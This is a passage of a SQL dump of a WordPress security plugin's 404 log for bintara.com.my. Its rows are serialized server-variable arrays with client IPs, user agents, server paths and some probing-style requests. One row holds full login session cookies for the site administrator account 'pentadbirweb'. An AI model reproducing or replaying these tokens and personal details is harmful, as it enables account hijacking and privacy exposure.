URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjYEqQg-7C5XlRoF7K61QAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569249298.3046\";s:12:\"REQUEST_TIME\";s:10:\"1569249298\";}}','notice','2019-09-23 14:34:59','2019-09-23 14:34:58',30759392,32576240,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'162.243.13.195'),(26876,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/D3117A87\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.248.161\";s:11:\"REMOTE_PORT\";s:5:\"62908\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjnlKQg-7C5XlRoF7LB2gAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569253268.4989\";s:12:\"REQUEST_TIME\";s:10:\"1569253268\";}}','notice','2019-09-23 15:41:10','2019-09-23 15:41:08',30816184,32637776,'https://bintara.com.my/?page_id=18',1,0,'223.206.248.161'),(26877,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:62:\"Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv 11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.248.161\";s:11:\"REMOTE_PORT\";s:5:\"55988\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYj16aQg-7C5XlRoF7LHKwAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569256937.4344\";s:12:\"REQUEST_TIME\";s:10:\"1569256937\";}}','notice','2019-09-23 16:42:19','2019-09-23 16:42:17',30812856,32631856,'https://bintara.com.my/?page_id=18',1,0,'223.206.248.161'),(26878,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.248.161\";s:11:\"REMOTE_PORT\";s:5:\"50232\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYkGlvLT3hjYYZpXT@nYTwAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569261206.5931\";s:12:\"REQUEST_TIME\";s:10:\"1569261206\";}}','notice','2019-09-23 17:53:28','2019-09-23 17:53:26',30814648,32633224,'https://bintara.com.my/?page_id=11',1,0,'223.206.248.161'),(26879,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/?page_id=18%2Fcontact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:24:\"page_id=18%2Fcontact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"52594\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYkX4mLkiuNLQQwjy5lbMQAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569265635.0364\";s:12:\"REQUEST_TIME\";s:10:\"1569265635\";}}','notice','2019-09-23 19:07:16','2019-09-23 19:07:15',30812736,32624488,'https://bintara.com.my/?page_id=18%2Fcontact.php',1,0,'136.243.199.108'),(26880,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.248.161\";s:11:\"REMOTE_PORT\";s:5:\"50012\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYkj-DXwAkGgnPePZ3HwPwAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569268732.2378\";s:12:\"REQUEST_TIME\";s:10:\"1569268732\";}}','notice','2019-09-23 19:58:55','2019-09-23 19:58:52',31206760,33021984,'https://bintara.com.my/?page_id=18',1,0,'223.206.248.161'),(26881,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYkrYvLT3hjYYZpXT@nmGAAAARA\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:13:\"117.27.81.123\";s:11:\"REMOTE_PORT\";s:5:\"36411\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYkrYvLT3hjYYZpXT@nmGAAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569270626.5616\";s:12:\"REQUEST_TIME\";s:10:\"1569270626\";}}','notice','2019-09-23 20:30:29','2019-09-23 20:30:26',31153384,32962792,'https://bintara.com.my/our-history/about1/',1,0,'117.27.81.123'),(26882,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.248.161\";s:11:\"REMOTE_PORT\";s:5:\"52445\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYkxGS-hSs4yT7zPcWftVAAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569272089.9377\";s:12:\"REQUEST_TIME\";s:10:\"1569272089\";}}','notice','2019-09-23 20:54:52','2019-09-23 20:54:50',31209896,33032232,'https://bintara.com.my/?page_id=11',1,0,'223.206.248.161'),(26883,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:73:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-admin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"335-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:638:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569226408; wp-saving-post=1410-saved\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"335-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"335-3\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlj2kxABsgUhwCb1f37jwAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYlj2kxABsgUhwCb1f37jwAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"54740\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-admin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYlj2kxABsgUhwCb1f37jwAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569285082.5684\";s:12:\"REQUEST_TIME\";s:10:\"1569285082\";}}','notice','2019-09-24 00:31:24','2019-09-24 00:31:22',31681152,31940672,'https://bintara.com.my/wp-admin.php',1,1,'175.142.115.214'),(26884,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:76:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-admin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"9\";s:13:\"H2_STREAM_TAG\";s:5:\"331-9\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, 